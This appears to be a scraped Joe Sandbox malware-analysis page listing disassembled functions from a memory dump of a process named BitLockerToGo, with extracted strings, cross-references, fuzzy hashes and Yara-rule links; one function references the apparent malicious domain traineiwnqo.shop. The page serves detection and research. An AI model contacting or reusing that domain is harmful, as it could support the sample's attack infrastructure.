Opcode Fuzzy Hash: a2b923ffa6b332d4a3c247d1da566372a93b9be2640f0db65b8054cfd4f436cb
Instruction Fuzzy Hash: A742DB70608301DFC304CF28D890B6AB7E2FF99354F18892DE9968B3A1D339D895CB56

Function 0041AA90 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 371COMMON

Download Yara Rule

Strings

"!, xrefs: 0041AB9E
3, xrefs: 0041AB76
RW, xrefs: 0041AF38
CC, xrefs: 0041AF40
U_, xrefs: 0041AF30
P_, xrefs: 0041AF48

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "!$CC$P_$RW$U_$3
API String ID: 0-574667654
Opcode ID: c4b51d92376cff741dd522550a3a6cba1f88220cc55e6f7aadfbb76d5f028f26
Instruction ID: 32b841bf03b20ad9f625492d4b90af74ef50ee2ac08f24dccbf438ce0955bc33
Opcode Fuzzy Hash: c4b51d92376cff741dd522550a3a6cba1f88220cc55e6f7aadfbb76d5f028f26
Instruction Fuzzy Hash: BED132B01093819BD310DF09D490A6BBBF1EF96388F144A1DE1D98B361E378D995CB9B

Function 00414AF0 Relevance: 12.3, Strings: 9, Instructions: 1076COMMON

Download Yara Rule

Strings

2-wC, xrefs: 00415056
s{>S, xrefs: 00414FEB
DttH, xrefs: 00414FDB
x=t3, xrefs: 004156F6
|, xrefs: 004153FF
01, xrefs: 004156FE
mXg&, xrefs: 00415003
}vp#, xrefs: 00414FE3
`Web, xrefs: 00414FFB

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 01$2-wC$DttH$`Web$mXg&$s{>S$x=t3$|$}vp#
API String ID: 0-3332577240
Opcode ID: f8b330022f5e61e4a26fcbdafce339100315a126424510fad1ebb9376f8768f9
Instruction ID: 853d9f6bf2354e92a9dee1a6a22a6d467b715767102ecc3076fb5f3be24ee6c0
Opcode Fuzzy Hash: f8b330022f5e61e4a26fcbdafce339100315a126424510fad1ebb9376f8768f9
Instruction Fuzzy Hash: 3F7288B050C3808FD315DF18D4906ABFBE1EF96344F148A1DE1CA4B3A2D3799985CB9A

Function 00426C28 Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 561COMMON

Download Yara Rule

Strings

mkB, xrefs: 00426F8F
atyc, xrefs: 0042722E
micb, xrefs: 00427235
u|p{, xrefs: 00427220

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: atyc$micb$mkB$u|p{
API String ID: 0-2681846194
Opcode ID: 4d506061099f337f6c239b1f9ae42af22e97cabf1379e286ac2555c06a73c731
Instruction ID: eed14352bb78df5a86c336bd29a326de0acb98c400771e5c52f97dfa9562d85a
Opcode Fuzzy Hash: 4d506061099f337f6c239b1f9ae42af22e97cabf1379e286ac2555c06a73c731
Instruction Fuzzy Hash: 6B1215306057918BD7348F25D480B63BBF2EFA2314F658A5ED4E64BBC2D378A805C769

Function 0041CD59 Relevance: 9.2, Strings: 7, Instructions: 484COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041D380
T], xrefs: 0041CE11
UX, xrefs: 0041CE06
UW, xrefs: 0041CD61
kU, xrefs: 0041CE1C
4`[b, xrefs: 0041D1C0
4`[b, xrefs: 0041D2B0

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: UW$4`[b$4`[b$4`[b$T]$UX$kU
API String ID: 0-4057271314
Opcode ID: 31427ff083c4c35127a329d53a43fcb20a94932e8a16ae2c17682606c4f8be9d
Instruction ID: 2ee70e2164894f0263a2616007b7695b604e3b01748a301103711750673c76ee
Opcode Fuzzy Hash: 31427ff083c4c35127a329d53a43fcb20a94932e8a16ae2c17682606c4f8be9d
Instruction Fuzzy Hash: 3AF198B46083819FE728DF14D991B6FB7E2FB85304F24892DE5C5473A2D7389885CB4A

Function 0040AD00 Relevance: 6.6, Strings: 5, Instructions: 383COMMON

Download Yara Rule

Strings

x, xrefs: 0040AF22
AQNW, xrefs: 0040B162
0, xrefs: 0040AD6A
p, xrefs: 0040ADE6
VU, xrefs: 0040B16D

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$AQNW$VU$p$x
API String ID: 0-3738745974
Opcode ID: 03f1ebcff9d6749262c20da91357d74f7575aacd3a4198725e7d5c201ada8cc6
Instruction ID: eac3550c5038b9c5101a136c1740ec547a5dd399440fd59a39d864d5124d776c
Opcode Fuzzy Hash: 03f1ebcff9d6749262c20da91357d74f7575aacd3a4198725e7d5c201ada8cc6
Instruction Fuzzy Hash: 24E125B020C3809BD314EF19C590A2FBBE5EF95748F148A1DE1D99B392C7399815CB9B

Function 004304D0 Relevance: 6.5, Strings: 5, Instructions: 277COMMON

Download Yara Rule

Strings

-u#, xrefs: 00430536
P%_;, xrefs: 004304EC
E9z?, xrefs: 004304F4
J=K3, xrefs: 004304FC
\, xrefs: 0043058B

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -u#$E9z?$J=K3$P%_;$\
API String ID: 0-4268602472
Opcode ID: 4a8373f2f05ef36b96b605d597935eca99ba83ad5e57b7d39a7b4ef8cad603ab
Instruction ID: 75df036bb1c6fd8b66953e705bbf0fe5382c9bab640cf8e8efd70ff933f7fd21
Opcode Fuzzy Hash: 4a8373f2f05ef36b96b605d597935eca99ba83ad5e57b7d39a7b4ef8cad603ab
Instruction Fuzzy Hash: 65813A7420C741CBD318DF28DCA273AB7A1EF8A314F14962EE5854B7E1E7399844CB99

Function 00426343 Relevance: 5.7, Strings: 4, Instructions: 686COMMON

Download Yara Rule

Strings

/.)(, xrefs: 0042646F
_[WV, xrefs: 0042692F
RZ ], xrefs: 004263AA
RfB, xrefs: 0042663C

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)($RZ ]$RfB$_[WV
API String ID: 0-1565869799
Opcode ID: 516c8b19184310a19b231422f5b1d655cec223a9a5633ffe4c0d89f69cfa6164
Instruction ID: f1d3dbe78d5f99d1e40b9d082bc96ee0335b832c0d682af001e7bea2e0a0bad1
Opcode Fuzzy Hash: 516c8b19184310a19b231422f5b1d655cec223a9a5633ffe4c0d89f69cfa6164
Instruction Fuzzy Hash: 6A32E274204B518BD339CF35E1A47A3BBE2AF46308F548A6EC0E787786C739A405CB59

Function 0041DCB7 Relevance: 5.5, Strings: 4, Instructions: 520COMMON

Download Yara Rule

Strings

==Bs, xrefs: 0041DB94
2A, xrefs: 0041E11F
264&, xrefs: 0041DB84
., xrefs: 0041DB74

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .$264&$2A$==Bs
API String ID: 0-3406142248
Opcode ID: c7b397baa075f652455fa9e320ea5dd5eddf82c664eba8de7a17038bef101e4b
Instruction ID: a56383949f493098e493313467f6cff8fc8b86ba10075949e11530e66b2f8825
Opcode Fuzzy Hash: c7b397baa075f652455fa9e320ea5dd5eddf82c664eba8de7a17038bef101e4b
Instruction Fuzzy Hash: DA0236B5A0C3918FC714CF19D4916ABBBE1AFC9304F04486EE4C687342D339D946CB9A

Function 00413EA7 Relevance: 5.5, Strings: 4, Instructions: 497COMMON

Download Yara Rule

Strings

/.)(, xrefs: 00414046, 00413EA6
$, xrefs: 0041410F
4`[b, xrefs: 00414090
5, xrefs: 00413F7C

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $$/.)($4`[b$5
API String ID: 0-3935969054
Opcode ID: 8e7275754ce150e810a8d4ee05503ecb9aa3862ce1c3d2baee6a6be9da55d019
Instruction ID: e1b78ec81548cda021009d897145f6a575e36aac4c331104a53ee0724400cae6
Opcode Fuzzy Hash: 8e7275754ce150e810a8d4ee05503ecb9aa3862ce1c3d2baee6a6be9da55d019
Instruction Fuzzy Hash: F8F1AAB16083408BD310EF29D88166FBBE5EF85354F04882EF9C587392E739E955CB5A

Function 00419A40 Relevance: 5.4, Strings: 4, Instructions: 360COMMON

Download Yara Rule

Strings

w5M7, xrefs: 00419A5A
4`[b, xrefs: 00419DB0
L1M3, xrefs: 00419A86
(), xrefs: 00419A62

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ()$4`[b$L1M3$w5M7
API String ID: 0-3177161136
Opcode ID: 310f425b4370c35d88fd88c6940fd973a92652b35fbe17582df8cc6e173a067a
Instruction ID: 7a8c7e22a64126cf52c2f01453b29fc783c719e83acdb6216d06a6b359e05e22
Opcode Fuzzy Hash: 310f425b4370c35d88fd88c6940fd973a92652b35fbe17582df8cc6e173a067a
Instruction Fuzzy Hash: 7B91C1715082109BD714AF14D8A2ABBB3E5EF95354F08451EF8C69B391E338ED84C79A

Function 004127CF Relevance: 5.3, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

/.)(, xrefs: 004128F8
/.)(, xrefs: 00412A18
4`[b, xrefs: 00412B10
4`[b, xrefs: 00412940

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)($/.)($4`[b$4`[b
API String ID: 0-3239421534
Opcode ID: 4edaf742ec3de1233061a0e56f76530d8f664d044291ebc507b94c1acbc839b5
Instruction ID: 06c122124c0a94fdcec484fb75245611134eef54f39a040ad1145f332110448c
Opcode Fuzzy Hash: 4edaf742ec3de1233061a0e56f76530d8f664d044291ebc507b94c1acbc839b5
Instruction Fuzzy Hash: 17B1AE70208341EBE7288F14D961B6FB7F1EFCA354F14892CE5864B291D37AE855CB86

Function 004245A0 Relevance: 4.2, Strings: 3, Instructions: 484COMMON

Download Yara Rule

Strings

SSHN, xrefs: 00424666
PDYY, xrefs: 0042467A
O\PB, xrefs: 00424670

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: O\PB$PDYY$SSHN
API String ID: 0-3384902915
Opcode ID: 5d05f6a9043ad37e308e0370f57c8ac4a6c612d575e64f490816a788d0edef03
Instruction ID: c3a31ce2741b174a9e6ebcbc38a207f6cf5d74e5508e952d4b81521a752f6cf7
Opcode Fuzzy Hash: 5d05f6a9043ad37e308e0370f57c8ac4a6c612d575e64f490816a788d0edef03
Instruction Fuzzy Hash: E602BEB4604B518BD3248F39D4903A3BBE2FF96304F548A6EC4FA4B386D3396445CB99

Function 0041049E Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

r, xrefs: 004106EA
fm, xrefs: 00410793
qA, xrefs: 0041096B

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: fm$qA$r
API String ID: 0-2197523684
Opcode ID: d7e42a7e436fb6789d46a34936b3c090f69d0fa2eba50b54ea501ad9852df74d
Instruction ID: 5d033b3a330e60e2212e8b68b7b9e541c435e900af12635ad59dd57e6658b8ac
Opcode Fuzzy Hash: d7e42a7e436fb6789d46a34936b3c090f69d0fa2eba50b54ea501ad9852df74d
Instruction Fuzzy Hash: 12D1137011C380ABE324DB18D594BAFBBE5EF86704F14482EF48997242D378DC85DB6A

Function 0041F840 Relevance: 4.1, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

TV, xrefs: 0041F857
PO, xrefs: 0041F867
*-, xrefs: 0041FABD

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *-$PO$TV
API String ID: 0-2555063705
Opcode ID: 4764da8532ffec13f3bda9b34457a7e2fcfcb91c64509d3e3880a8598b13595b
Instruction ID: 20b23a6503a29b0f577c78f8d0acbb9ad8103a3fb479d3fabd876f4ced969ade
Opcode Fuzzy Hash: 4764da8532ffec13f3bda9b34457a7e2fcfcb91c64509d3e3880a8598b13595b
Instruction Fuzzy Hash: 9DD135B01083419BD314DF19D490B6BBBE1FF86348F104A2DE5C99B3A2D738D995CB9A

Function 004064A0 Relevance: 3.3, Strings: 2, Instructions: 811COMMON

Download Yara Rule

Strings

0, xrefs: 00406DED
8, xrefs: 00406DE5

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 206e8d763d4aa45a14140d3827f98f38c9b107646f33315e84b9a82ce8f0bc4b
Instruction ID: 2bd65cb329508929153e0368fd656edf51641c6179af97c1a7e4cae3af578d44
Opcode Fuzzy Hash: 206e8d763d4aa45a14140d3827f98f38c9b107646f33315e84b9a82ce8f0bc4b
Instruction Fuzzy Hash: 7C7247716083409FDB20CF18C980B5BBBE1AF98314F05892EF9899B391D379D958CB96

Function 0040F02D Relevance: 3.1, Strings: 2, Instructions: 606COMMON

Download Yara Rule

Strings

0, xrefs: 0040F6DB
8, xrefs: 0040F801

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 956ea7fe0f89e7c45f6812a7e0a119981eda8e896643460e3228b431f565bd68
Instruction ID: d70135b525cc106781db9e93feede32c5930dbe67b2da2b054735a2a0e07ed4e
Opcode Fuzzy Hash: 956ea7fe0f89e7c45f6812a7e0a119981eda8e896643460e3228b431f565bd68
Instruction Fuzzy Hash: 64129C705083809BD325CF68D89076FBBE1AF96304F14483EE4C9A7392D779D949CB6A

Function 004059E0 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

IEND, xrefs: 00405E9D
), xrefs: 00405A78

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: c193c43fad0a859558d1f3a964d9b2570a11e6aa2cf1ff538cc41b3f2bf546d0
Instruction ID: 604b1ffecebab74bf41fb23b06df68ff13fd873f177ace3e4e077787fdb7f8ca
Opcode Fuzzy Hash: c193c43fad0a859558d1f3a964d9b2570a11e6aa2cf1ff538cc41b3f2bf546d0
Instruction Fuzzy Hash: CDF1CF71A08B019BD314DF28C85572BBBE1EB84314F14863EE995A73C1D778E914CB8A

Function 00437590 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

bvC, xrefs: 0043760E
@yC, xrefs: 0043791E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @yC$bvC
API String ID: 0-413810154
Opcode ID: 9c28c3cb9c12d0478078bcd9b0ec947571a95c764b258f6766d7e14a3f508e28
Instruction ID: f02e8eb569a3a6a42852b876dbfa3f5bfde72b1c5a3b7cbeff359c2eeabcecf5
Opcode Fuzzy Hash: 9c28c3cb9c12d0478078bcd9b0ec947571a95c764b258f6766d7e14a3f508e28
Instruction Fuzzy Hash: 9DA1A93960C251CFC318DF28D59062AB7E2FFCA314F59896DE98A93761C770E851CB86

Function 00437130 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

ruC, xrefs: 004374FB, 0043751C
btC, xrefs: 0043744E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: btC$ruC
API String ID: 0-3407738418
Opcode ID: 52c5ac3c94af0354deadf709a39174961e6833ae273b9f42b81b61c443ceecde
Instruction ID: eee13dd835a5a428f7c0a1dd10adc2331028c3f071b7867dbe2a4167c1a8dddc
Opcode Fuzzy Hash: 52c5ac3c94af0354deadf709a39174961e6833ae273b9f42b81b61c443ceecde
Instruction Fuzzy Hash: 7291E0B9A08266CFCB10CF68D98026EF7B0FF4A315F5A447AD88567351C370AD51CB95

Function 00437AA2 Relevance: 2.8, Strings: 2, Instructions: 269COMMON

Download Yara Rule

Strings

2{C, xrefs: 00437AAF
X{C, xrefs: 00437AB5

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2{C$X{C
API String ID: 0-2999403496
Opcode ID: e010fc7a12804e97f0800c443275da08adc59cc69594ced77d385385cc049b1a
Instruction ID: 4d295a038e6fe9e455aaaac55153b05d9cfca1357de211df5c34ff61e6937a32
Opcode Fuzzy Hash: e010fc7a12804e97f0800c443275da08adc59cc69594ced77d385385cc049b1a
Instruction Fuzzy Hash: AE91B076A18291CFC314CF28D96025AB7E2FBCA325F19887DE8D5C7350D778E9418B85

Function 00437280 Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

ruC, xrefs: 004374FB, 0043751C
btC, xrefs: 0043744E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: btC$ruC
API String ID: 0-3407738418
Opcode ID: 7ec441a9a430b22d4a1ba8f45d78619cd49aebf1628227ffea95e88134cd9135
Instruction ID: 3c12999ee2f48f63b732735714698a7688cc7d835cddcd9b1aec6cf09051bdfa
Opcode Fuzzy Hash: 7ec441a9a430b22d4a1ba8f45d78619cd49aebf1628227ffea95e88134cd9135
Instruction Fuzzy Hash: 767188B5E0426ACFCB10CFA8D9802AEB7B1FB0A311F5A04A9D91077351C374AD55CBA8

Function 004133F7 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

lw, xrefs: 004134DA
8, xrefs: 00413555

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 8$lw
API String ID: 0-750133594
Opcode ID: 894a90900f504895475255d3fa362a14460dd49155a91b7dc9a381f7db68d78e
Instruction ID: 5591fc565476e4b09b88eac37685c9ec136f9f4304a331b277d5f1cc73560484
Opcode Fuzzy Hash: 894a90900f504895475255d3fa362a14460dd49155a91b7dc9a381f7db68d78e
Instruction Fuzzy Hash: DC51EF70118380AFD364DF15D490A5FFBF1EF86319F54892EE99987242D33AD9448B1B

Function 00412054 Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004120E0
/.)(, xrefs: 00412098

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)($4`[b
API String ID: 0-525040469
Opcode ID: c3191d6e3c6de3aada8230576888871754b42135e3129239f693af7927dea313
Instruction ID: 71be124252a5236f33d649e8415c4be69c6122b9ebdcdc38e9afdbecf747c68e
Opcode Fuzzy Hash: c3191d6e3c6de3aada8230576888871754b42135e3129239f693af7927dea313
Instruction Fuzzy Hash: C731E234219301DBE7088F24D9A076FB7E1EF89358F14C92CE48A872A1D335D991CF86

Function 0040F20D Relevance: 2.0, Strings: 1, Instructions: 726COMMON

Download Yara Rule

Strings

9, xrefs: 0041031B

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-837608440
Opcode ID: 220546e60b5fa50bd968189e7b24368ec2de030299cd662a3aa44039675a5596
Instruction ID: b42859884b0ad56d1e8381e29ee347229ef0ee73ca08165d213771ba0b14e467
Opcode Fuzzy Hash: 220546e60b5fa50bd968189e7b24368ec2de030299cd662a3aa44039675a5596
Instruction Fuzzy Hash: 3A3299716083809BD314CF68D88076FBBE1AF85708F14496EF48997392E778DD89CB5A

Function 00425A69 Relevance: 2.0, Strings: 1, Instructions: 721COMMON

Download Yara Rule

Strings

@cB, xrefs: 00425F35

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @cB
API String ID: 0-1507413002
Opcode ID: efc7e782bed3f4754040c76798c45be90034694568309df29bb60df0044c25a0
Instruction ID: d94c3a4938c63ea80fde1637e8956818833a178438835eba8de094804c517eb5
Opcode Fuzzy Hash: efc7e782bed3f4754040c76798c45be90034694568309df29bb60df0044c25a0
Instruction Fuzzy Hash: 6F427D70205B918AD735CF29D1947A3FBE1AF16704F8449AED4EB8B782C339B405CB69

Function 004197E0 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043B538,00000000,00000001,0043B528), ref: 00419809

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: ff6cb35c10c278261e5eb79fe75c1021c36d32bfa50ca809adc2779b9f39fa83
Instruction ID: ab7a0136b372060ad714af43b12e1594b838d84f7bcc297dfd885977ee9ec93e
Opcode Fuzzy Hash: ff6cb35c10c278261e5eb79fe75c1021c36d32bfa50ca809adc2779b9f39fa83
Instruction Fuzzy Hash: D551BFB1614300ABDB20AF25CCA2BB733A4FF86758F144519F9858B391E379DC45C76A

Function 00436AED Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

DoC, xrefs: 00436F3A

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: DoC
API String ID: 0-2237832012
Opcode ID: ac50d49dbb065bcf056e188551ba9d3f8e059da021e95b294a8137ff2ec7623b
Instruction ID: 543ab8997921d47249dac4c444afd3d62eaf7a62aad5acecd693937106d77bcc
Opcode Fuzzy Hash: ac50d49dbb065bcf056e188551ba9d3f8e059da021e95b294a8137ff2ec7623b
Instruction Fuzzy Hash: FA023939A08361CFC314CF2CD89022ABBE1AF89314F5A85BDE8D58B392D775D945CB85

Function 0041EEFB Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041F4A0

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: f91626a3bcb55719959c1ef5ee84f9c32ef534b03cb3b5a9aec54535f069caa6
Instruction ID: 7ed853ab267211193b7a24dab7c64f4eab0973d3d593b0758f7be8db432bb903
Opcode Fuzzy Hash: f91626a3bcb55719959c1ef5ee84f9c32ef534b03cb3b5a9aec54535f069caa6
Instruction Fuzzy Hash: CEF1F271608381DFD714CF28D89175AB7E2BF8A314F148ABDE499873A2C335D949CB4A

Function 00421030 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

", xrefs: 00421337

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 8296a046ee2962ad1b533f0ed03763faa28f49587575701548afe7d91146e68c
Instruction ID: e71ec9929540a9463c5aee597d4f02aa881249c399715990c813f2f740fe8852
Opcode Fuzzy Hash: 8296a046ee2962ad1b533f0ed03763faa28f49587575701548afe7d91146e68c
Instruction Fuzzy Hash: 97C13872B083605BD724CE24D480B6BB7D5AFA4350F59892FF889873A2D63CDD44C79A

Function 00437690 Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

@yC, xrefs: 0043791E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @yC
API String ID: 0-2666759751
Opcode ID: 86449a2efe8a37c910928b03b8f94cf01608bf6861ed3a17f72d698174d5c242
Instruction ID: 02884ba85b2f42dc8c2efd82b147294d9b4de87fdeff3787b594e2c785335e1c
Opcode Fuzzy Hash: 86449a2efe8a37c910928b03b8f94cf01608bf6861ed3a17f72d698174d5c242
Instruction Fuzzy Hash: CBA1DF3660C2418FC718DF28D9A062EB7E2FFC9314F19892DE5C6973A5C775A811CB86

Function 0040D286 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

traineiwnqo.shop, xrefs: 0040D2F2

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: traineiwnqo.shop
API String ID: 0-223458199
Opcode ID: 51219f81e3afb18b017001acbdaeee883cfc5119c49dff401fbc211aba8d31c5
Instruction ID: cdb169f497b19616dc45a89326b5fcb330121ed0599e318b5ba5fef2e71bf374
Opcode Fuzzy Hash: 51219f81e3afb18b017001acbdaeee883cfc5119c49dff401fbc211aba8d31c5
Instruction Fuzzy Hash: 9DB181B4A04216DFDB08CF94DD90ABFBBB1FF4A300F144569E512AB395D3749851CBA8

Function 004110C7 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

, xrefs: 0041130E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
